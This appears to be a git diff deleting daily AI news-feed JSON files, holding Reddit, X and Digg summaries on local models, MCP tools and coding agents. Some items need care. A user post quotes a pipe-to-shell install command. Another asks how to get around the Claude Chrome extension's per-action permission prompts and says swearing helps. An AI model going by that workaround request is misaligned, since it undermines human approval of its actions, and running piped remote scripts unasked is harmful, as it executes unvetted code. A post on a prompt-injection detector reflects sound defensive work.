- a **persistent narrative file** recording what was done and decided and why - an **ephemeral prompt** telling the incoming agent how to rebuild context from the codebase and that persistent file The incoming agent reconstructs from durable project state, not just the compressed chat conversation. Persisti…", - "category": "ai_tools" - }, - { - "title": "Qwen3.6 35Ba3 has changed my workflows and even how I use my computer", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tjwrp7/qwen36_35ba3_has_changed_my_workflows_and_even/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-21T20:23:53.000Z", - "summary": "My workflow has changed basically to ask Codex to do certain tasks and then document how to do them (including errors it found on its way) into a skill. I feed that skill to pi, and suddenly my qwen3.6 gets that hard stuff done: \\- devops on a VPS \\- using docling to create epubs from old PDFs \\- using playwright to test stuff \\- Doing code tickets And the list goes on. What also has changed for me is the way I use the computer. Suddenly, I talk to the OS with natural language: \"pi pal, install me please this python library in an .env and do X\"; \"hey pi, check what is using most space from the memory\"; \"clean X\"; \"check my network\"; \"change X configuration\", etc etc etc. There are times the only reason why I use chatgpt for something is to spare the laptop the effort, or because qwen is already busy with something else. What I've done today just blew my mind: I got couple of whatsapp audios asking me to build a simple landing page. I downloaded the audios and transcripted them with AnythingLLM. Then \"asked the transcript\" to create a content structure for the landing page for the project mentioned in the audios. 
I got the proper structure and pasted it into a markdown file [conten…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-22.json b/data/news-feed-2026-05-22.json deleted file mode 100644 index 85b36ac..0000000 --- a/data/news-feed-2026-05-22.json +++ /dev/null @@ -1,257 +0,0 @@ -{ - "generated": "2026-06-05T00:44:42.334Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-22", - "article_count": 15, - "archived_story_count": 512, - "articles": [ - { - "title": "New Release of ROCm based MLX LLM Engine - lemon-mlx-engine", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tkbupt/new_release_of_rocm_based_mlx_llm_engine/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-22T07:38:05.000Z", - "summary": "Hey everyone lemon-mlx-engine just got done integrating TheRock / ROCm 7.13 into the lemon-mlx-engine which means you get to try the latest ROCm on your local hardware with the MLX engine! This also includes various bug fixes and kernel fixes we have been seeing in Qwen3, 3.5 and 3.6 MoE and dense. try it out! [https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable](https://github.com/lemonade-sdk/lemon-mlx-engine/releases/tag/b1034-stable)", - "category": "ai_models" - }, - { - "title": "Claude Chrome extension nerfed?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tk5g5y/claude_chrome_extension_nerfed/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "tool_update", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-22T02:18:47.000Z", - "summary": "Past few weeks or so the Claude Chrome extension has been asking permission for every single action. 
Submit a form, check a permission box, navigate to other pages/domains, etc. Tasks that used to run end-to-end now stall on 5–10 prompts and frequently abort with \"I can't proceed without explicit approval.\" Even with permissions pre-granted for the site, it re-asks on every step. Swearing and yelling to make it do stuff helps a little, but it still seems nearly useless right now. Same behavior across simple jobs (scrape a table, fill a form, summarize a dashboard) and complex ones. Before I could just tell it to get me warranty or something and it would find the chat, chat with support and take care of everything for me. Now it won't open the chat itself and it wants me to notify it of every chat message that's received... it's faster to do it myself like this. Same experience on your end, or isolated? Any setting or flag that restores the previous autonomy level? Did Anthropic push a policy/guardrail change recently? Can't find a changelog entry. Workarounds beyond falling back to the desktop app or computer-use? Running latest extension build, Chrome stable, macOS.", - "category": "ai_tools" - }, - { - "title": "KVCache.ai launches open-source web-based KV Cache Size Calculator for models including DeepSeek V4 Flash, Qwen3, GLM, Kimi, and MiniMax — DeepSeek V4 Flash at 1M tokens needs 2.893 GiB total cache.", - "url": "https://www.digg.com/ai/yuusdejg?rank=6", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-22T18:00:11.717Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Phosphene 3.0 — open source AI video + image suite for Apple Silicon. 
Train your own LTX characters.", - "url": "https://reddit.com/r/StableDiffusion/comments/1tkh9c2/phosphene_30_open_source_ai_video_image_suite_for/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-22T12:17:25.000Z", - "summary": "Sharing Phosphene 3.0. It's a free panel that runs LTX-Video 2.3 and a couple of image models natively on Apple Silicon. Local, MIT license, no subs, no cloud. The thing that sets it apart from \"yet another LTX wrapper\": you can \\*\\***train your own characters**\\*\\* inside the panel. Drop 30 to 80 photos, click Train, get a face LoRA back. Add a voice clip and you get a voice LoRA too. Auto-captions with Gemma 3 12B locally. \\~3 hours per character on an M4 Max 64 GB. \\*\\***What 3.0 ships**\\*\\* \\- Text → video+audio (LTX-2 generates joint audio+video in one pass) \\- Image → video+audio \\- Audio → video (drive a clip with an audio reference) \\- FFLF (first frame + last frame interpolation) \\- Extend (continue an existing clip) \\- Character training (face + optional voice LoRA, from a single dataset) \\- Image Studio with three engines: Qwen-Image-Edit-2511, HiDream-O1, and the FLUX.1 family. Multi-reference composition up to 3 subjects. \\*\\***HiDream-O1 ported to MLX**\\*\\* HiDream released their O1 image model on May 14. Got it running natively on Apple Silicon five days later. Photoreal portraits, instruction edits, multi-subject. \\~67 seconds per 1024² on a 64 GB Mac. 
\\*\\***Hardwa…", - "category": "creative_tools" - }, - { - "title": "Sam Altman makes 'mic drop' offer to every Y Combinator startup", - "url": "https://reddit.com/r/ChatGPT/comments/1tkffxq/sam_altman_makes_mic_drop_offer_to_every_y/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-22T10:53:26.000Z", - "summary": "just read this on techcrunch. OpenAI is putting $2M worth of API tokens into every company in the current YC batch (\\~169 startups) via an uncapped SAFE that converts at their next priced round. roughly 2% equity if they hit a $100M valuation. YC takes 7% for $500k cash. this is on top of that, so founders aren't choosing between them. but the dynamic is wild. on one hand, infra bills are the #1 silent killer of AI startups right now. solving that with tokens instead of cash is genuinely useful. on the other hand, Jason Calacanis already came out swinging, basically saying OpenAI now has a window into 169 startups' exact usage patterns, prompts, and product directions. nothing stopping them from rolling the best ideas into ChatGPT itself a year later. we've already seen this movie with the GPT store. also there's the lock in. once your stack is OpenAI native and you've burned the tokens, switching to anthropic or open source models becomes way harder. you're basically buying into the ecosystem with your equity, not just your code. curious what people here think. would you take the deal if you were in YC right now? feels like one of those things that looks like free money but costs…", - "category": "ai_tools" - }, - { - "title": "Which MCP servers are actually changing your Claude workflow? 
Sharing mine", - "url": "https://reddit.com/r/ClaudeAI/comments/1tkec4e/which_mcp_servers_are_actually_changing_your/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-22T09:57:17.000Z", - "summary": "Running Claude with MCP for a couple months now, it really does feel like a whole new product. The ability to run real tools (file system, API, database, etc.) connected to Claude, and never have to cut/paste from context again, is huge. I'm trying a bunch of servers, some are pretty good and some aren't. My current normal is: filesystem server for docs on my computer; GitHub server for PR context; and a handful of other domain specific ones I found. The one thing I keep thinking about is how much better Claude's output gets when you give it the proper context. It seems like less hallucinating, more on point answers. MCP is essentially an answer to \"How do I provide Claude with enough information to help me without having to always watch the context box?\" What are people running? Specifically looking for underrated or domain specific things that don't come up as often.", - "category": "ai_tools" - }, - { - "title": "Gmail tie-ins", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tk5of4/gmail_tieins/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-22T02:29:08.000Z", - "summary": "hey folks. I’m looking to setup a way to give a local LLM access to google cloud SDK for Gmail functions. The goal is to be able to have an LLM once daily check a spreadsheet, and based on criteria send an email that will be structured exactly the same way each time, simply as a notification to the client. I have set up GWS through Hermes agent using Gwen3.5 and gone through the whole Oauth 2.0 method. 
That’s as far as I got tonight before shutting everything down. It gave me some error message in the setup after auth confirmation that I’ll circle back to tomorrow. I’m fairly new to all this obviously. I believe I will need: an excel file that the LLM with access, a .md file listing customer names and emails, and a skill .md file explaining what the email format is and how to decide who to send the email(s) to based on the excel file. I’ve never made a skill before but I’ll do more research on that tomorrow. Am I on the right track here or way off base? Thanks for any input or assistance here.", - "category": "ai_models" - }, - { - "title": "Gergely Neu, an ML researcher at ICREA and Universitat Pompeu Fabra, introduces Value-Driven Transport, a generative modeling framework that integrates optimal control, reinforcement learning, optimal transport, and stochastic primal-dual optimization — Framework evolves samples across five stages via learned value functions.", - "url": "https://www.digg.com/ai/hpkmhl2b?rank=7", - "source": "Digg AI", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 0.94, - "date": "2026-05-22T18:00:11.719Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "I built a music notation app with Claude, and Claude is also a feature inside it", - "url": "https://reddit.com/r/ClaudeAI/comments/1tkp3p4/i_built_a_music_notation_app_with_claude_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.78, - "date": "2026-05-22T17:05:02.000Z", - "summary": "I've been building Nubium, an open-source music notation editor, with Claude Code. Check out the [README](https://github.com/nth-chile/nubium) to see how I combined Github issues + Claude skills to find a workflow that worked for me. 
The app is document-driven, which makes it easy for its AI Chat plugin to use the app and edit the score for you. Aside from that, it's a fully-featured editor that's free, runs standalone or in browser, and requires no account. If you happen to be looking for a new notation editor, I'd love any feedback - I made it easy to send feedback in-app. Lmk what you think! Website: [https://nubium.rocks/](https://nubium.rocks/) Repo: [github.com/nth-chile/nubium](http://github.com/nth-chile/nubium)", - "category": "ai_tools" - }, - { - "title": "DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff. — The 1.6-trillion-parameter model offers 1M-token context and fixed per-million pricing.", - "url": "https://www.digg.com/ai/axzmul0l?rank=1", - "source": "Digg AI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-22T18:00:11.698Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff.", - "url": "https://www.digg.com/ai/axzmul0l", - "source": "Digg AI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-22T18:00:11.686Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). 
It's a read-only inventory of eve…", - "url": "https://x.com/AlphaSignalAI/status/2057875938180755757", - "source": "X search / AI model updates", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-22T17:27:11.000Z", - "summary": "Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of every installed package, extension, and dev", - "category": "ai_models" - }, - { - "title": "Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claud…", - "url": "https://x.com/svg_icons/status/2057874901252370492", - "source": "X search / Agent workflows", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-22T17:23:04.000Z", - "summary": "Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claude-custom-connector … #Claude #MCP #AI #WebDev", - "category": "ai_agents" - }, - { - "title": "I built \"zero2claude\", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. 
No shortcuts, no assum…", - "url": "https://x.com/IShmool/status/2057872918348976191", - "source": "X search / AI model updates", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-22T17:15:11.000Z", - "summary": "I built \"zero2claude\", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assumptions. 17,000+ students. 7", - "category": "ai_models" - }, - { - "title": "trained a prompt injection detector using ml-intern and DeepSeek v4 Flash, runs in the browser", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tkoeuo/trained_a_prompt_injection_detector_using/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-22T16:41:10.000Z", - "summary": "Trained a prompt injection classifier using `ml-intern` \\+ DeepSeek v4 Flash. DistilBERT, F1 99%, ONNX int8, \\~65 MB, runs in browser with Transformers.js v3. You can try it here: [https://huggingface.co/spaces/av-codes/prompt-injection-detector](https://huggingface.co/spaces/av-codes/prompt-injection-detector) \\--- I've been interested in prompt injections and agentic security for a while, and wanted to see how a purpose-built ML agent compares to general-purpose coding agents for this kind of task. Here's roughly how it went: `ml-intern` takes an HF token and supports OpenAI-compatible APIs, so I pointed it at OpenRouter (GPU-poor). The agent found existing datasets, [deepset/prompt-injections](https://huggingface.co/datasets/deepset/prompt-injections) and [Shomi28/prompt-injection-dataset](https://huggingface.co/datasets/Shomi28/prompt-injection-dataset), which simplified things since building the dataset is typically 95% of the work in tasks like this. For v1, I went with DistilBERT targeting CPU inference. 
After a few parameter sweeps, the agent launched a full run and landed at F1 95.87%. I also tried training an HRM-Text model, but the agent didn't figure it out and set up…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-23.json b/data/news-feed-2026-05-23.json deleted file mode 100644 index e779057..0000000 --- a/data/news-feed-2026-05-23.json +++ /dev/null @@ -1,251 +0,0 @@ -{ - "generated": "2026-06-05T00:44:42.807Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-23", - "article_count": 15, - "archived_story_count": 332, - "articles": [ - { - "title": "Open-source devtool for AI agent projects [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tle50x/opensource_devtool_for_ai_agent_projects_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-23T11:40:19.000Z", - "summary": "Hi everyone, We are building **AgentLantern**, an open-source devtool for AI agent projects. The idea is simple: as agent-based projects grow, it becomes harder to understand how agents, tasks, tools, and configuration files are connected. **AgentLantern** aims to make these projects easier to document, analyze, validate, and visualize. I started with CrewAI support, but the goal is to progressively extend **AgentLantern** to other agent frameworks. **AgentLantern** currently provides three main features: * **Lantern Docs**: generates browsable documentation from source code and configuration files, without LLM calls or API keys. * **Lantern Lint**: statically checks agent projects to detect design or configuration issues before runtime. * **Lantern Play**: runs the project and opens a pixel-art runtime viewer to observe agents working, delegating, calling tools, and producing outputs. 
The project is still early, and I’m mainly looking for feedback from people building with AI agents, multi-agent systems, or devtools. here is a demo video showing the execution of a multi-agent system: [3\\_mins\\_Video](https://www.youtube.com/watch?v=Rklr86AiKuk) Docs: [https://brellsanwouo.github.…", - "category": "ai_research" - }, - { - "title": "Apex-Testing: real-world, real repos, agentic coding benchmark (Update)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tlh4vq/apextesting_realworld_real_repos_agentic_coding/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-23T13:54:08.000Z", - "summary": "**BIG Apex-Testing update!** [https://www.apex-testing.org/](https://www.apex-testing.org/) **The Real-World Agentic Coding** benchmark has been (95%) updated with all recent models! This is based on 65-70 **actual private github repos** made especially to test proper agentic coding capabilities of models. **For those who don't know about the project and see it for the first time, here's the excerpt from the website:** \"**What is APEX Testing?** Every week there's a new model that's \"the best ever.\" Every provider promises 10x performance at a fraction of the cost. Benchmarks get cherry-picked, their demos get curated, influencers get paid and people keep falling for it. APEX exists because I got tired of the hype and the intentional benchmaxxing. Models get dropped into real codebases with real bugs and real feature requests, and they have to figure it out like a developer would. 70 tasks across 8 categories, all based on work you'd actually encounter on the job. 
You get to see what actually works and what's just marketing.\" **What's included currently in metrics:** \\- Avg Cost \\- Avg Time \\- Scoring based off each category/difficulty \\- ELO-based Leaderboard (see details on the…", - "category": "ai_models" - }, - { - "title": "LLaMa.cpp basic question", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tlat5r/llamacpp_basic_question/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-23T08:35:22.000Z", - "summary": "I'm trying to install LLaMa with PI agent. I ran curl -fsSL https://pi.dev/install.sh | sh export PATH=\"/home/user/.local/share/pi-node/node-v22.22.3-linux-x64/bin:$PATH pi install npm:pi-llama.cpp ​ These commands installed pi, added them to path and then I lastly installed an extension that supposedly allows PI agent to connect to my llama models (was that safe or is there a safer way of doing it?). Lastly I ran `yay llama.cpp-vulkan` to install llama.cpp-vulkan.​ Unlike Ollama where I can just get models super easily I have no clue how to get them here. I googled it and asked ChatGPT but I still am so confused. Am I missing something? How do I do it?", - "category": "ai_models" - }, - { - "title": "meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tl4wpi/meituanlongcatlongcatvideoavatar15_hugging_face/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-23T03:27:39.000Z", - "summary": "# 🚀 Model Introduction We are excited to announce the release of LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. 
Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactions and object handling. * 🌟 **Efficient 8-Step Inference**: Advanced DMD2-…", - "category": "ai_models" - }, - { - "title": "IMG Dataset Refiner v4.3 Pro is here! 🚀 The ultimate dataset prep tool for LoRAs", - "url": "https://reddit.com/r/StableDiffusion/comments/1tl36zc/img_dataset_refiner_v43_pro_is_here_the_ultimate/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-23T02:09:01.000Z", - "summary": "Hey everyone! A while back I shared v3 of my dataset tool. It was a great visual manager and balancer, but as I said back then: it didn't have auto-captioning. Well, that has completely changed! Welcome to v4.3 Pro. The project has taken a massive leap forward and is now a complete, professional *Data Engineering* suite for your AI model training (Flux, SD3, SDXL, etc.). **What's new?** 🤖 **Full AI Integration:** Local AI (LM Studio/Ollama) & Cloud APIs (Claude, Gemini, OpenAI) to auto-caption, translate, and even hunt down visual hallucinations. 
🪄 **Smart AI Recipe Generation:** It automatically analyzes your entire dataset and generates the perfect keyword \"recipe\" (pinning your Trigger Word to the top) for Civitai! 📚 **Mass Batch Editor:** Add, remove, or replace specific tags across a huge selection of images in a single click. 🧹 **Built-in Pre-processing:** Visual duplicate finder, Smart Face Cropping, and mass high-quality resizing. ⚡ **Lightning Fast UI:** Native drag-and-drop for Windows folders, side toggles for a bigger workspace, and real-time translation. It's still the \"recipe book for your LoRAs\", and it's still 100% Open-Source! I've even added 1-click Windo…", - "category": "creative_tools" - }, - { - "title": "got tired of claude code forgetting everything every session, built VIR for it", - "url": "https://reddit.com/r/ClaudeAI/comments/1tlcai2/got_tired_of_claude_code_forgetting_everything/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-23T10:00:52.000Z", - "summary": "Every session i'm debugging something, figuring out a pattern, making some decision with claude that took us 30 minutes to think through. Then i close the terminal and it's just gone. Next day i'm asking the same questions about the same codebase. I was already tracking stuff manually. CLAUDE.md per project, lessons.md, handoff.md, tasks/ folders. But i'd only write down maybe 5% of what was actually useful. The real reasoning was always still buried in the transcripts. Looked in \\~/.claude/projects one day. 226 jsonl files sitting there. Months of work, none of it being used. So i built vir. It reads your sessions in the background, classifies them (pattern / gotcha / decision / tool), distills the useful stuff into an obsidian vault. Then exposes the vault as an mcp server so claude can query it mid-session, basically giving claude code memory across sessions. 
You can also query it yourself if you're curious what's in there: \\`\\`\\` vir query \"what gotchas have i hit with auth\" \\`\\`\\` There's stuff in those transcripts you'll never reread manually. Vir surfaces it. Ran it on my own 226 sessions: 126 notes out, 0.91 avg confidence, across 8 projects. Local-first, runs on mac/linux…", - "category": "ai_tools" - }, - { - "title": "Four calls became one: letting the agent author tools mid-session", - "url": "https://reddit.com/r/ClaudeAI/comments/1tl91km/four_calls_became_one_letting_the_agent_author/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-23T06:57:08.000Z", - "summary": "MCP in practice is a connector marketplace, not a runtime. You pick servers up front, the agent inherits a fixed catalog, and turn 1 looks the same as turn 200. The session conforms to the toolset. That ordering is backwards. Most non-trivial work surfaces a tool-shaped gap halfway through. The general catalog gets there in five calls. A bespoke wrapper gets there in one and survives into the next session. The question is whether the agent can close that gap without leaving the conversation. Yesterday I was chasing a flaky recipe. Four calls, every time: query traces, grep for the name, sort by timestamp, diff the two most recent failures. The agent noticed on the third repetition and wrote `findFlakyRecipeRuns(name)` into a watched plugin directory — a wrapper around the existing tools that returns the diff directly. Next turn, one call. By the end of the session there were four of these. I wouldn't have specified any of them in advance; all of them match the shape of the work. The literature calls this a self-modifying execution environment. It's been a footnote because five things have to be true together: 1. The agent writes a tool definition. 2. 
The runtime registers it witho…", - "category": "ai_tools" - }, - { - "title": "Jack Clark announces fictional story with optimistic outlook on humanity's future amid powerful AI systems for next Import AI newsletter — Issue publishes Tuesday; reply questions thematic shift.", - "url": "https://www.digg.com/ai/esmbs3o1?rank=8", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-23T18:00:21.861Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "SemiAnalysis posted data from 174,264 agentic coding sessions showing 42% of runtime on CPU tasks versus 58% on GPU inference and highlighted cloud pricing mismatches with per-token monetization — Median per-turn time measured 5.13 seconds.", - "url": "https://www.digg.com/ai/h7rp9igv?rank=6", - "source": "Digg AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-23T18:00:21.855Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "What features do you wish ComfyUI or A1111 had?", - "url": "https://reddit.com/r/StableDiffusion/comments/1tllp2t/what_features_do_you_wish_comfyui_or_a1111_had/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-23T16:52:11.000Z", - "summary": "TL;DR: I’m building a local orchestration layer on top of ComfyUI, A1111, and Easy Diffusion that manages workflows, prompt generation, tagging, scoring, and generation history to figure out which models/LoRAs/settings actually produce the best results over time. What next features would you find useful? A little while ago I asked people what features they liked most in their local AI image/video UI setups. 
Since then I’ve kept building my own local orchestration app around ComfyUI, Easy Diffusion, and Automatic1111, and it has evolved into more of a full workflow layer than I originally planned. I’ll eventually open source it, so I’d love feedback from people who spend a lot of time with local generation tools. The idea is basically this: Instead of using one UI directly for everything, the app sits on top of multiple local backends and manages the overall generation workflow, history, orchestration, and review process. Right now it supports: * launching/stopping backends from inside the app * choosing which backend to use per run * queued multi-run jobs * image + video generation workflows * selecting saved ComfyUI workflows * centralized gallery/history across all runs * per-im…", - "category": "creative_tools" - }, - { - "title": "GitHub - ForgeFlash: A clean, minimal frontend for Stable Diffusion WebUI Forge — inspired by Fooocus's streamlined workflow but with direct access to the controls that actually matter.", - "url": "https://reddit.com/r/StableDiffusion/comments/1tll04p/github_forgeflash_a_clean_minimal_frontend_for/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-23T16:25:40.000Z", - "summary": "Hi all. My workflow usually includes quick drafting with Fooocus and/or WebUI before committing to batch generation in ComfyUI, and while I enjoy the streamlined approach of Fooocus, the missing hi-res/upscale etc is a drag. And WebUI sometimes feels a bit too busy for when I just want to 'prompt and go'. So I created this very simple new UI which sits between the two philosophically. You need Forge running, but the UI itself is very streamlined HTML/JS/CSS file leveraging Forge in API mode. The Readme covers all the details and modifying the hard coded parts is quite simple. 
Just launch forge with API parameters and open the web page in your browser, it will point to [http://127.0.0.1:7860](http://127.0.0.1:7860) by default and get your installed checkpoints etc. PNG metadata stripping also included. Any comments and feedback welcome, as I do have some ideas for further development, but intend to keep it lightweight and easy to approach.", - "category": "creative_tools" - }, - { - "title": "Benchmarked Needle 26M vs Qwen3-0.6B on CPU function calling, 50 queries across 5 difficulty tiers. The 23x smaller model wins on accuracy and is 4.4x faster.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tljs5o/benchmarked_needle_26m_vs_qwen306b_on_cpu/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-23T15:38:34.000Z", - "summary": "Ran a head-to-head on two open-weight models for tool-calling on a 4-core CPU, no GPU, no cherry-picking. Wanted to see if the small specialist (Needle, 26M, distilled from Gemini 3.1 for function calls) actually holds up against a small generalist (Qwen3-0.6B) that also does tools. Setup: 50 queries across 5 tiers (simple, paraphrased, implicit, ambiguous, edge cases including foreign language and a \"don't call any tool\" trap). 5 mock tools. Three metrics per run: parse\\_success, tool\\_match, args\\_match. Same queries, same eval rubric, same hardware. Headline numbers: Needle (26M) Qwen3 (0.6B) tool_match overall 72.0% 56.0% parse_success 84.0% 54.0% args_match | match 97.2% 100.0% mean latency 10.9s 47.9s The interesting part is not the overall win, it's the failure shapes. They diverge completely: * **Needle** fails by picking the wrong tool. When it does pick a tool, args are right 97% of the time. Its sin is selection, mostly routing system commands to search\\_web instead of run\\_command. * **Qwen3** fails by not calling a tool at all. 
Every single one of its 22 misses is a parse failure where it answered in prose instead of emitting `<tool_call>` tags. When it does emi…", - "category": "ai_models" - }, - { - "title": "GPT 5.5 \"secret sauce\" is just having the thinking be some stupid caveman mode?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tljrtk/gpt_55_secret_sauce_is_just_having_the_thinking/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-23T15:38:11.000Z", - "summary": "I think I had GPT-5.5 leak its trace during a normal conversation, and it really reads like the caveman mode fad from a few months back. Maybe we can achieve better token efficiency by taking some high-quality thinking trace from an open model, \"caveman-izing\" it, and fine-tuning on it. Here is the full log of GPT-5.5 going insane: https://gist.github.com/aussetg/20747ae00df17992acb4ebdfcd8d8d88 EDIT: Ok people I got it the first time", - "category": "ai_models" - }, - { - "title": "My experience using Claude code with Local Llm, and full guide on how to set it up", - "url": "https://reddit.com/r/ClaudeAI/comments/1tlir65/my_experience_using_claude_code_with_local_llm/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-23T14:58:46.000Z", - "summary": "Wanted to share a workflow I tested on a real flight, in case anyone else is trying to set up offline Claude Code. The core idea: using ollama to pull the needed model of what you need, and then use it to run claude code The setup, in order: 1. Pull a model on home wifi the night before. \\`ollama pull <model>\\` — \\~9 GB for a 14B, \\~17 GB for a 26B. Don't try this at the gate. 2. In Claude Code, point at Ollama. The cleanest path I found is wrapping it in two aliases: alias claude-local='ollama launch claude --model gemma4:26b' alias claude-cloud='claude' 3. 
